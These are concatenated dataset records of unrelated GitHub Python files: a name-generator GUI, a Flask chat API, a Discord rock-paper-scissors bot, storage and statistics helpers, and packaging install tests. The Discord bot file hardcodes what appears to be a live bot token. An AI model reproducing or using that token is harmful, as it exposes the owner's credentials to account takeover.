[]\n\t\t\n\t\tfor i in range(10):\n\t\t\t#name = gen.generate_name()\n\t\t\tname, name_spaced = gen.generate_name()\n\t\t\tprint(name)\n\t\t\t#print(type(name))\n\t\t\tprint(name_spaced)\n\t\t\t#print(type(name_spaced))\n\t\t\tnames.append(name)\n\t\t\tnames_spaced.append(name_spaced)\n\t\t\n\t\tself.name_list.delete(0, \"end\")\n\t\tself.syl_name_list.delete(0, \"end\")\n\n\t\tfor name in names:\n\t\t\tself.name_list.insert(0, name)\n\n\t\tfor name_spaced in names_spaced:\n\t\t\tself.syl_name_list.insert(0, name_spaced)\n\ndef setup():\n\troot = tk.Tk()\n\n\tapp = App(root)\n\n\tapp.master.title(\"Random Name Generator\")\n\tapp.master.maxsize(1280, 720)\n\n\troot.mainloop()\n\n\nsetup()\n","repo_name":"IAmNotIsaac/random-name-generator","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37912585041","text":"class Reviewdocs(object):\n \"\"\"docstring for Reviewdocs\"\"\"\n def __init__(self, arg=0):\n self.arg = arg\n\n def post_get_reviews():\n return {\n \"get\" : {\n \"tags\" : [ \"review\" ],\n \"summary\" : \"Get business reviews\",\n \"description\" : \"This can only be done by any user.\",\n \"operationId\" : \"getBusinessReviews\",\n \"produces\" : [ \"application/json\" ],\n \"parameters\" : [ {\n \"name\" : \"businessId\",\n \"in\" : \"path\",\n \"description\" : \"ID of business that whose reviews are to be fetched\",\n \"required\" : True,\n \"type\" : \"integer\",\n \"minimum\" : 1,\n \"format\" : \"int64\"\n } ],\n \"responses\" : {\n \"200\" : {\n \"description\" : \"operation successful\",\n \"schema\" : {\n \"$ref\" : \"#/definitions/inline_response_200_3\"\n }\n }\n }\n },\n \"post\" : {\n \"tags\" : [ \"review\" ],\n \"summary\" : \"Post business review\",\n \"description\" : \"This can only be done by an authenticated user.\",\n \"operationId\" : \"postReview\",\n \"produces\" : [ \"application/json\" ],\n \"parameters\" : [ {\n \"name\" : \"businessId\",\n \"in\" : \"path\",\n \"description\" : \"ID of business being reviewed\",\n \"required\" : True,\n \"type\" : \"integer\",\n \"minimum\" : 1,\n \"format\" : \"int64\"\n }, {\n \"in\" : \"body\",\n \"name\" : \"body\",\n \"description\" : \"Updated business object\",\n \"required\" : True,\n \"schema\" : {\n \"$ref\" : \"#/definitions/Review\"\n }\n } ],\n \"responses\" : {\n \"200\" : {\n \"description\" : \"operation successful\",\n \"schema\" : {\n \"$ref\" : \"#/definitions/inline_response_200_4\"\n }\n }\n }\n }\n }\n ","repo_name":"dondrzzy/The-Business-Center","sub_path":"app/apidocs/reviews_docs.py","file_name":"reviews_docs.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19642304101","text":"from collections import OrderedDict\nimport codecs\n\n\ndef get_topk_query(keyword_log_file, topk_num):\n \"\"\"\n get topk query by download count\n :param keyword_log_file:\n :param topk_num:\n :return: topk query's reversing ordered dictionary\n \"\"\"\n query_dict = OrderedDict()\n with codecs.open(keyword_log_file, 'r') as rf:\n for line in rf.readlines():\n items = line.split('|')\n query = items[0]\n download_count = items[-1]\n query_dict[query] = int(download_count)\n\n return OrderedDict(list(sorted(query_dict.items(), key=lambda x: -x[1]))[:topk_num])\n\n\ndef get_topk_query_app_lick_log(app_click_log_file, wanted_keys, name_dict: OrderedDict, topk):\n \"\"\"\n get topk's doc from every query's app lick log\n :param wanted_keys: the queries to get DOC\n :param name_dict: the dictionary of APPID and DOC\n :param topk: limit to get the size of topk's doc\n :return: a ordered dictionary of ordered dictionary\n \"\"\"\n click_log_dict = {}\n with codecs.open(app_click_log_file, 'r') as rf:\n for line in rf.readlines():\n items = line.split('|')\n current_key = items[0]\n app_id = items[1]\n app_download_count = items[-1]\n if click_log_dict.__contains__(current_key):\n click_log_dict[current_key][app_id] = (name_dict[app_id], app_download_count)\n else:\n click_log_dict[current_key] = OrderedDict()\n if name_dict.__contains__(app_id):\n click_log_dict[current_key][app_id] = (name_dict[app_id], app_download_count)\n\n for key, doc_dict in click_log_dict.items():\n click_log_dict[key] = OrderedDict(list(sorted(doc_dict.items(), key=lambda x: -x[1][1])[:topk]))\n\n return click_log_dict\n\n\ndef load_resources(filename):\n \"\"\"\n load resource file like this:\n APPID|string\n :param filename:\n :return: a dictionary that key is APPID, value is string\n \"\"\"\n resource_dict = {}\n with codecs.open(filename, 'r') as rf:\n for line in rf.readlines():\n app_id = line.split('|')[0]\n value_str = line.split('|')[-1]\n resource_dict[app_id] = value_str\n\n return resource_dict\n\n\ndef count_word_frequency(word_list, topk):\n \"\"\"\n count the words' frequency in list\n :param word_list: a string list\n :param topk: limitation number of result size\n :return: a dictionary ofr words frequency\n \"\"\"\n wordfreq = OrderedDict()\n for w in word_list:\n wordfreq[w] = word_list.count(w)\n\n return OrderedDict(list(sorted(wordfreq.items(), key=lambda x: -x[1]))[:topk])\n\n\ndef get_tag_word_frequency(tag_dict, app_click_log_dict, topk):\n \"\"\"\n get tags' words frequency count\n :param tag_dict:\n :param app_click_log_dict:\n :return: tags' words frequency dictionary\n \"\"\"\n word_dict = OrderedDict()\n for query, click_log_dict in app_click_log_dict.items():\n tag_list = []\n for app_id in click_log_dict.keys():\n tag_list = tag_list + tag_dict[app_id].split(',')\n word_dict[query] = count_word_frequency(tag_list, topk)\n return word_dict\n\n\ndef save_topk_doc(data, output_file):\n \"\"\"\n query|[\"doc1\", \"doc2\", ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n pass\n\n\ndef save_topk_tag(data, output_file):\n \"\"\"\n query|[tag_word1, tag_word2, ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n\n pass\n\n\ndef save_topk_doc_query(data, output_file):\n \"\"\"\n doc|[query1, query2, ...]\n :param data:\n :param output_file:\n :return:\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n # limit doc size\n doc_topk = 100\n # get top 10000 query\n keyword_click_log_file = ''\n app_click_log_file = ''\n\n doc_file = ''\n first_tag_file = ''\n second_tag_file = ''\n third_tag_file = ''\n\n doc_dict = load_resources(doc_file)\n first_tag_dict = load_resources(first_tag_file)\n second_tag_dict = load_resources(second_tag_file)\n third_tag_dict = load_resources(third_tag_file)\n\n keyword_click_log_dict = get_topk_query(keyword_click_log_file)\n app_click_log_dict = get_topk_query_app_lick_log(app_click_log_file, keyword_click_log_dict.keys(), doc_dict,\n doc_topk)\n\n","repo_name":"zhetanger/query-doc-tag-statistics","sub_path":"query_doc_tag_statistics.py","file_name":"query_doc_tag_statistics.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1067184224","text":"#!/usr/bin/python3\n\nimport os\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\n\nclass DBStorage:\n __engine = None\n __session = None\n\n def __init__(self):\n user = os.getenv(\"HBNB_MYSQL_USER\")\n pwd = os.getenv(\"HBNB_MYSQL_PWD\")\n host = os.getenv(\"HBNB_MYSQL_HOST\", default=\"localhost\")\n db = os.getenv(\"HBNB_MYSQL_DB\")\n\n self.__engine = create_engine(\n \"mysql+mysqldb://{}:{}@{}/{}\".format(user, pwd, host, db),\n pool_pre_ping=True)\n\n if os.getenv(\"HBNB_ENV\") == \"test\":\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n if cls is None:\n classes = [BaseModel, User, State, City, Amenity, Place, Review]\n else:\n classes = [cls]\n\n objs = {}\n for c in classes:\n query = self.__session.query(c)\n for obj in query:\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n objs[key] = obj\n return objs\n\n def new(self, obj):\n self.__session.add(obj)\n\n def save(self):\n self.__session.commit()\n\n def delete(self, obj=None):\n if obj:\n self.__session.delete(obj)\n\n def reload(self):\n Base.metadata.create_all(self.__engine)\n Session = scoped_session(sessionmaker(\n bind=self.__engine, expire_on_commit=False))\n self.__session = Session()\n\n\n def close(self):\n \"\"\"Closes the current session.\"\"\"\n self.__session.close()\n","repo_name":"OfentseLoeto/AirBnB_clone_v4","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37152861664","text":"largest = None\r\nsmallest = None\r\n\r\nwhile True:\r\n num = input('Enter a number, type \"done\" to exit: ')\r\n if num == \"done\":\r\n break\r\n try:\r\n float(num)\r\n for i in num:\r\n if largest is None:\r\n largest = i\r\n elif i > largest:\r\n largest = i\r\n\r\n for p in num:\r\n if smallest is None:\r\n smallest = p\r\n elif p < smallest:\r\n smallest = p\r\n except:\r\n print(\"Invalid input\")\r\n\r\nprint(\"Maximium is\", largest)\r\nprint(\"Minimium is\", smallest)\r\n","repo_name":"jrfradella/halp-","sub_path":"assignment#5.py","file_name":"assignment#5.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71643511613","text":"from io import open\nfrom setuptools import setup\n\nversion = '0.1.0'\nlon_descr = 'the module downloads the archive with the assembled NEW program from the link, unzips the program and checks the checksum, If everything is OK, the NEW program overwrites the OLD program'\n\nsetup(\n name='file_update_lib',\n version = version,\n\n author='DarkRadish',\n author_email='gridasovalex19032003@gmail.com',\n\n description='file update library',\n long_description = lon_descr,\n\n packages=['file_update_lib']\n)\n","repo_name":"GridasovAlex/File_update_lib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7420302484","text":"import datetime\n\nfrom flask import request, jsonify\nfrom flask_login import current_user, login_required\n\nfrom app.conversations import conversations_api_blueprint, conversation_services\nfrom app.exceptions import BadRequest, Unauthorized, NotFound, Conflict\nfrom app.models import User, Conversation\n\n\n@conversations_api_blueprint.route('/all')\n@login_required\ndef get_all_conversations():\n \"\"\"\n Get all conversations for the current user.\n\n :return: A JSON response containing the serialized conversations.\n :rtype: flask.Response\n \"\"\"\n\n def last_update(conv: Conversation) -> datetime.datetime:\n \"\"\"\n Inner function to determine the time of the latest update that occurred in a conversation\n by taking the max of the creation time and time of last message; Used to sort conversations\n\n :param conv: Conversation to evaluate\n :type conv: Conversation\n :return: Time of the last update\n :rtype: datetime.datetime\n \"\"\"\n messages = list(conv.messages)\n if messages:\n return max(messages[-1].timestamp, conv.date_created)\n return conv.date_created\n\n convs = conversation_services.get_user_conversations(current_user.id)\n convs.sort(key=lambda conv: last_update(conv), reverse=True)\n return jsonify([conv.serialized for conv in convs])\n\n\n@conversations_api_blueprint.route('/<string:conversation_id>', methods=['GET', ])\n@login_required\ndef get_conversation(conversation_id: str):\n \"\"\"\n Get a specific conversation by its ID.\n\n :param conversation_id: The ID of the conversation.\n :type conversation_id: str\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 404: If the conversation with the given ID is not found.\n :raises 401: If the current user is not a participant in the conversation.\n \"\"\"\n\n conversation = Conversation.get_by_id(conversation_id)\n if not conversation:\n raise NotFound(message='Conversation not found')\n\n if not conversation_services.check_user_in_conversation(current_user.id, conversation_id):\n raise Unauthorized(message='You are not in this conversation, and therefore cannot view its data')\n\n return jsonify(conversation.serialized)\n\n\n@conversations_api_blueprint.route('/history/<string:conversation_id>')\n@login_required\ndef get_conversation_history(conversation_id: str):\n \"\"\"\n Get the history of a specific conversation by its ID.\n\n :param conversation_id: The ID of the conversation.\n :type conversation_id: str\n :return: A JSON response containing the serialized messages of the conversation.\n :rtype: flask.Response\n :raises 404: If the conversation with the given ID is not found.\n :raises 401: If the current user is not a participant in the conversation.\n \"\"\"\n\n conversation = Conversation.get_by_id(conversation_id)\n if not conversation:\n raise NotFound(message='Conversation not found')\n\n if not conversation_services.check_user_in_conversation(current_user.id, conversation_id):\n raise Unauthorized(message='You are not in this conversation, and therefore cannot view its data')\n\n onlyGetMessageIds = request.args.get('onlyGetId', default='false').lower() == 'true'\n if onlyGetMessageIds:\n return jsonify([message.id for message in conversation.messages])\n return jsonify([message.serialized_min for message in conversation.messages])\n\n\n@conversations_api_blueprint.route('/new/private', methods=['POST', ])\n@login_required\ndef create_private_conversation():\n \"\"\"\n Create a private conversation between the current user and a target user.\n\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 400: If the request does not specify the user to create a private conversation with,\n or the specified user is the current user\n :raises 409: If the current user attempts to create a conversation with themselves\n or if a conversation already exists between the users.\n \"\"\"\n target_id = request.json['target']\n if not target_id:\n raise BadRequest(message='Target user ID was not specified')\n\n if not User.get_by_id(target_id):\n raise BadRequest(message='User ID is invalid')\n\n if current_user.id == target_id:\n raise BadRequest(message='Target user ID cannot be current user ID')\n\n conversation = conversation_services.create_private_conversation(current_user.id, target_id)\n\n if not conversation:\n raise Conflict(message='A conversation already exists between the users')\n\n return jsonify(conversation.serialized)\n\n\n@conversations_api_blueprint.route('/new/group', methods=['POST', ])\n@login_required\ndef create_group_conversation():\n \"\"\"\n Create a group conversation with multiple users.\n\n :return: A JSON response containing the serialized conversation.\n :rtype: flask.Response\n :raises 400: If the group name or the group members were not specified\n or the provided list of group members contains invalid users\n \"\"\"\n\n group_name = request.json['name']\n if not group_name:\n raise BadRequest(message='Group name was not specified')\n\n user_ids = request.json['users']\n if not user_ids:\n raise BadRequest(message='User IDs were not specified')\n\n for user_id in user_ids:\n if not User.get_by_id(user_id):\n raise BadRequest(message='One of more of the provided user IDs was invalid')\n\n if current_user.id not in user_ids:\n user_ids.append(current_user.id)\n\n conversation = conversation_services.create_group_conversation(group_name, user_ids, current_user.id)\n return jsonify(conversation.serialized)\n","repo_name":"TheTrustyPwo/StudyHub","sub_path":"app/conversations/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"9479352227","text":"import discord\nimport discord.reaction\nimport discord.embeds\nimport asyncio\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = '.') # Change the command prefix\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n\n@client.command()\nasync def rps(ctx):\n await ctx.channel.send('Rock Paper Scissors')\n\n\n\nrlist = []\nrlist.append(None)\nrlist.append(None)\n\n@client.event\nasync def on_message(message):\n if (message.content[0:4] == '.rps'):\n\n if on_message.gamestatus == True:\n await message.channel.send('Game in Progress')\n return\n if len(message.mentions) != 1:\n return \n\n if message.mentions[0].bot == True:\n return \n \n on_reaction_add.ulist.append(message.mentions[0])\n on_reaction_add.ulist.append(message.author)\n\n # on_reaction_add.ulist[0] = message.mentions[0]\n # on_reaction_add.ulist[1] = message.author\n\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. ' + on_reaction_add.ulist[1].name, value ='Enter on Go!')\n on_message.m = await message.channel.send(embed = embed)\n await on_message.m.add_reaction('✂')\n await on_message.m.add_reaction('📰')\n await on_message.m.add_reaction('â›°')\n \n await asyncio.sleep(0.5)\n\n for i in range(3):\n await asyncio.sleep(1)\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. ' + on_reaction_add.ulist[1].name, value = str(3 - i))\n\n await on_message.m.edit(embed = embed)\n \n await asyncio.sleep(1)\n embed = discord.Embed()\n embed.add_field(name = 'Rock, Paper, Scissors!\\n'+ on_reaction_add.ulist[0].name + ' vs. ' + on_reaction_add.ulist[1].name, value = 'Go!')\n\n await on_message.m.edit(embed = embed)\n\n on_message.gamestatus = True\n await asyncio.sleep(5)\n\n if rlist[0] == None and rlist[1] == None and on_message.gamestatus == True:\n await message.channel.send('Neither players gave an input') \n rlist[0] = None\n rlist[1] = None\n on_reaction_add.ulist = []\n on_message.gamestatus = False\n on_reaction_add.check = False\n on_reaction_add.react = False\n on_reaction_add.timer = False\n\non_message.gamestatus = False\n\n\n\n@client.event\nasync def on_reaction_add(reaction, user):\n if on_message.m.id != reaction.message.id:\n return\n if on_message.gamestatus == False:\n return\n if user == client.user:\n return\n\n if on_reaction_add.ulist[0] == user:\n rlist[0] = reaction.emoji\n elif on_reaction_add.ulist[1] == user:\n rlist[1] = reaction.emoji\n \n #rlist.append(reaction.emoji)\n await asyncio.sleep(2)\n \n on_reaction_add.timer = True\n if (on_reaction_add.react == False):\n on_reaction_add.react = True\n \n if rlist[0] == None:\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' did not input on time')\n elif rlist[1] == None:\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' did not input on time')\n else:\n await reaction.message.channel.send(str(rlist[0]) + ' : ' + str(rlist[1]))\n on_reaction_add.check = True\n\n \n\n # Check for win condition\n if on_reaction_add.check:\n if rlist[0] == rlist[1]:\n await reaction.message.channel.send('Tie!')\n elif (str(rlist[0]) == '✂' and str(rlist[1]) == '📰'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n elif (str(rlist[0]) == '📰' and str(rlist[1]) == 'â›°'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n elif (str(rlist[0]) == 'â›°' and str(rlist[1]) == '✂'):\n await reaction.message.channel.send(on_reaction_add.ulist[0].name + ' has won!')\n \n elif (str(rlist[1]) == '✂' and str(rlist[0]) == '📰'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n elif (str(rlist[1]) == '📰' and str(rlist[0]) == 'â›°'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n elif (str(rlist[1]) == 'â›°' and str(rlist[0]) == '✂'):\n await reaction.message.channel.send(on_reaction_add.ulist[1].name + ' has won!')\n \n \n\n await asyncio.sleep(6)\n on_reaction_add.ulist = []\n rlist[0] = None\n rlist[1] = None\n on_message.gamestatus = False\n on_reaction_add.check = False\n on_reaction_add.react = False\n on_reaction_add.timer = False\n return\n # on_reaction_add.ulist[0] = None\n # on_reaction_add.ulist[1] = None\n\n\n \n\n \n\n# @client.event\n# async def on_reaction_add(reaction, user):\n# await reaction.message.channel.send('Duplicate')\non_reaction_add.ulist = []\n# on_reaction_add.ulist.append(None)\n# on_reaction_add.ulist.append(None)\non_reaction_add.check = False\non_reaction_add.react = False\non_reaction_add.timer = False\non_message.m = 0\n\nclient.run('NjQyOTE3ODI3MTM2OTc4OTY0.Xcd6cA.BCSLe7pTgjJcUoqT1gZ9p7H6YJc')","repo_name":"rynbhuiya/DiscordBotContest","sub_path":"rpsbot.py","file_name":"rpsbot.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36011847162","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rowdict = {}\n \n if numRows == 1:\n return s\n \n for i in range(numRows):\n rowdict[i] = []\n \n count = 0\n directionDown = True\n for char in s:\n rowdict[count].append(char)\n if count == numRows - 1:\n directionDown = False\n if count == 0:\n directionDown = True\n if directionDown:\n count += 1\n else:\n count -= 1\n \n ans = \"\"\n for key, value in rowdict.items():\n ans += \"\".join(value)\n print(ans)\n return ans","repo_name":"MadhuranS/leetcode-practice","sub_path":"zigzag-conversion.py","file_name":"zigzag-conversion.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16452994439","text":"from urllib.parse import urlparse, parse_qs\n\nimport requests\n\nBASE_URL = \"http://primo.nli.org.il/PrimoWebServices/xservice/search/full\"\n\n\ndef extract_doc_id(url):\n qs = urlparse(url).query\n d = parse_qs(qs)\n ids = d.get('doc') or d.get('docId')\n if not ids:\n raise KeyError(\"doc id not found in url: {}\".format(url))\n return ids[0]\n\n\ndef primo_request(doc_id):\n params = {\n \"institution\": \"NNL\",\n \"docId\": doc_id,\n \"json\": \"true\"\n }\n r = requests.get(BASE_URL, params)\n r.raise_for_status()\n d = r.json()\n doc = d['SEGMENTS']['JAGROOT']['RESULT']['DOCSET']['DOC']['PrimoNMBib'][\n 'record']\n return doc\n","repo_name":"buzush/MapApp","sub_path":"librarian/primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"768618569","text":"import os\n\nimport pytest\nfrom zm.utils import substBuiltInVars\nfrom zm import installdirvars\nfrom zm.autodict import AutoDict\nfrom zm.constants import PLATFORM, DEFAULT_BUILDWORKNAME\nfrom zm.features import TASK_TARGET_FEATURES\n\nfrom tests.func_utils import *\n\nFORINSTALL_PRJDIRS = [\n joinpath('cpp', '09-complex-unittest'),\n joinpath('subdirs', '2-complex'),\n]\n\ndef getInstallFixtureParams():\n\n fixtures = []\n dvarsCfgMap = installdirvars.CONFIG_MAP\n defaultVars = {\n name:dvarsCfgMap[name].default\n for name in ('prefix', 'bindir', 'libdir')\n }\n\n #### 1\n params = AutoDict(**defaultVars)\n params.installArgs = []\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 2\n params = AutoDict(\n prefix = '/usr/my',\n bindir = defaultVars['bindir'],\n libdir = defaultVars['libdir']\n )\n params.installArgs = ['--prefix', params.prefix]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 3\n params = AutoDict(\n prefix = '/usr/my',\n bindir = '/bb',\n libdir = '/ll',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--bindir', params.bindir,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 4\n params = AutoDict(\n prefix = '/usr/my',\n bindir = 'bb-aa',\n libdir = 'll_dd',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--bindir', params.bindir,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n #### 5\n params = AutoDict(\n prefix = 'usr2/my',\n bindir = defaultVars['bindir'],\n libdir = 'mylib',\n )\n\n params.installArgs = [\n '--prefix', params.prefix,\n '--libdir', params.libdir\n ]\n\n fixtures.append(AutoDict(id = len(fixtures) + 1, **params))\n\n ### store ids\n for item in fixtures:\n item['id'] = str(item['id'])\n\n pairs = []\n for i, _ in enumerate(fixtures):\n cur = fixtures[i]\n nex = fixtures[i+1] if i+1 < len(fixtures) else fixtures[0]\n pairs.append([cur, nex])\n\n return pairs\n\nINSTALL_FIXTURE_PARAMS = getInstallFixtureParams()\n\ndef checkBuildWorkDir(testSuit):\n \"\"\"\n Check that the @bld directory exists and isn't empty\n \"\"\"\n\n buildtypedir = testSuit.confManager.root.selectedBuildTypeDir\n buildworkdir = joinpath(buildtypedir, DEFAULT_BUILDWORKNAME)\n\n assert os.path.isdir(buildworkdir)\n assert len(os.listdir(buildworkdir)) > 0\n\n@pytest.mark.usefixtures(\"unsetEnviron\")\nclass TestInstall(object):\n\n @pytest.fixture(params = getZmExecutables())\n def allZmExe(self, request):\n self.zmExe = zmExes[request.param]\n\n @pytest.fixture(params = FORINSTALL_PRJDIRS)\n def project(self, request, tmpdir):\n\n def teardown():\n printErrorOnFailed(self, request)\n\n request.addfinalizer(teardown)\n setupTest(self, request, tmpdir)\n\n def _checkInstallResults(self, cmdLine, check):\n\n check = check.copy()\n assert isdir(check.destdir)\n\n isWindows = PLATFORM == 'windows'\n\n targets = set()\n processConfManagerWithCLI(self, cmdLine)\n\n checkBuildWorkDir(self)\n\n svars = self.confManager.root.builtInVars\n for name in ('prefix', 'bindir', 'libdir'):\n check[name] = substBuiltInVars(check[name], svars)\n if not os.path.isabs(check[name]):\n check[name] = '/' + check[name]\n check[name] = check[name].replace('/', os.sep)\n\n tasks = getBuildTasks(self.confManager)\n for taskName, taskParams in tasks.items():\n\n handleTaskFeatures(self, taskParams)\n features = taskParams['features']\n\n if 'test' in taskParams['features']:\n # ignore tests\n continue\n\n if not [ x for x in features if x in TASK_TARGET_FEATURES ]:\n # check only with features from TASK_TARGET_FEATURES\n continue\n\n taskEnv = getTaskEnv(self, taskName)\n fpattern, targetKind = getTargetPattern(taskEnv, features)\n\n if targetKind == 'stlib':\n # static libs aren't installed\n continue\n\n isExe = targetKind == 'exe'\n target = taskParams.get('target', taskName)\n\n if 'install-path' not in taskParams:\n targetdir = check.bindir if isExe else check.libdir\n else:\n installPath = taskParams.get('install-path', '')\n if not installPath:\n continue\n\n installPath = os.path.normpath(utils.substBuiltInVars(installPath, svars))\n targetdir = installPath\n\n if not os.path.isabs(targetdir):\n targetdir = joinpath(check.prefix, targetdir)\n\n if check.destdir:\n targetdir = joinpath(check.destdir,\n os.path.splitdrive(targetdir)[1].lstrip(os.sep))\n\n targetpath = joinpath(targetdir, fpattern % target)\n targets.add(targetpath)\n\n if targetKind == 'exe':\n assert os.access(targetpath, os.X_OK)\n\n if targetKind == 'shlib':\n verNum = taskParams.get('ver-num', None)\n if verNum:\n nums = verNum.split('.')\n if targetpath.endswith('.dylib'):\n fname = fpattern % (target + '.' + nums[0])\n targets.add(joinpath(targetdir, fname))\n fname = fpattern % (target + '.' + verNum)\n targets.add(joinpath(targetdir, fname))\n else:\n targets.add(targetpath + '.' + nums[0])\n targets.add(targetpath + '.' + verNum)\n\n if taskEnv.DEST_BINFMT == 'pe':\n fname = fpattern % (target + '-' + nums[0])\n targets.add(joinpath(targetdir, fname))\n\n if isWindows:\n targetpath = joinpath(targetdir, '%s.lib' % target)\n assert isfile(targetpath)\n targets.add(targetpath)\n\n for root, _, files in os.walk(check.destdir):\n for name in files:\n path = joinpath(root, name)\n assert path in targets\n\n @pytest.fixture(params = INSTALL_FIXTURE_PARAMS, ids = lambda x: x[0]['id'])\n def installFixtures(self, request, tmpdir):\n\n testdir = str(tmpdir.realpath())\n fixturesList = request.param.copy()\n for fixtures in fixturesList:\n fixtures['destdir'] = joinpath(testdir, 'inst')\n\n return fixturesList\n\n def test(self, allZmExe, project, installFixtures):\n\n for fixtures in installFixtures:\n destdir = fixtures.destdir\n\n cmdLine = ['install', '--destdir', destdir]\n cmdLine.extend(fixtures.installArgs)\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n\n self._checkInstallResults(cmdLine, fixtures)\n\n cmdLine[0] = 'uninstall'\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n assert not os.path.exists(destdir)\n\n#############################################################################\n#############################################################################\n\nFORINSTALLFILES_PRJDIRS = [\n joinpath('mixed', '01-cshlib-cxxprogram'),\n]\n\n@pytest.mark.usefixtures(\"unsetEnviron\")\nclass TestInstallFiles(object):\n\n @pytest.fixture(params = getZmExecutables())\n def allZmExe(self, request):\n self.zmExe = zmExes[request.param]\n\n @pytest.fixture(params = FORINSTALLFILES_PRJDIRS)\n def project(self, request, tmpdir):\n\n def teardown():\n printErrorOnFailed(self, request)\n\n request.addfinalizer(teardown)\n setupTest(self, request, tmpdir)\n\n def _prepareFixtures(self, fixtures, testdir):\n\n fixtures['destdir'] = joinpath(testdir, 'inst')\n\n if self.testDirPath == FORINSTALLFILES_PRJDIRS[0]:\n\n dirprfx = '$(appdatadir)/scripts'\n\n files = [\n { 'path' : dirprfx + '/my-script.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '/test.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '/asd/test2.py', 'chmod' : 0o755, },\n #{ 'path' : dirprfx + '/my-script.link.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '2/my-script.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '2/test.py', 'chmod' : 0o755, },\n { 'path' : dirprfx + '3/my-script.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '3/test.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '3/test2.py', 'chmod' : 0o644, },\n { 'path' : dirprfx + '/mtest.py', 'chmod' : 0o750 },\n ]\n\n if PLATFORM == 'linux':\n files.extend([\n { 'path' : dirprfx + '/mtest-link.py', 'linkto' : dirprfx + '/mtest.py' },\n ])\n\n if PLATFORM != 'windows':\n files.extend([\n { 'path' : dirprfx + '/my-script.link.py', 'chmod' : 0o755, },\n ])\n files.extend([\n { 'path' : dirprfx + '2/my-script.link.py', 'linkto' : './my-script.py' },\n ])\n else:\n # unknown project, forgot to add ?\n assert False\n\n for item in files:\n item['path'] = item['path'].replace('/', os.sep)\n\n fixtures['files'] = files\n\n return fixtures\n\n @pytest.fixture(params = INSTALL_FIXTURE_PARAMS, ids = lambda x: x[0]['id'])\n def installFixtures(self, request, tmpdir):\n\n testdir = str(tmpdir.realpath())\n fixturesList = request.param\n fixturesList = [self._prepareFixtures(x.copy(), testdir) for x in fixturesList]\n\n return fixturesList\n\n def test(self, allZmExe, project, installFixtures):\n\n def handlePath(path, svars):\n return substBuiltInVars(path, svars).replace('/', os.sep)\n\n for fixtures in installFixtures:\n\n fixtures = fixtures.copy()\n destdir = fixtures.destdir\n\n cmdLine = ['install', '--destdir', destdir]\n cmdLine.extend(fixtures.installArgs)\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n\n processConfManagerWithCLI(self, cmdLine)\n checkBuildWorkDir(self)\n\n svars = self.confManager.root.builtInVars\n\n for item in fixtures['files']:\n filepath = handlePath(item['path'], svars)\n if os.path.isabs(filepath):\n # path must be relative because of os.path.join\n filepath 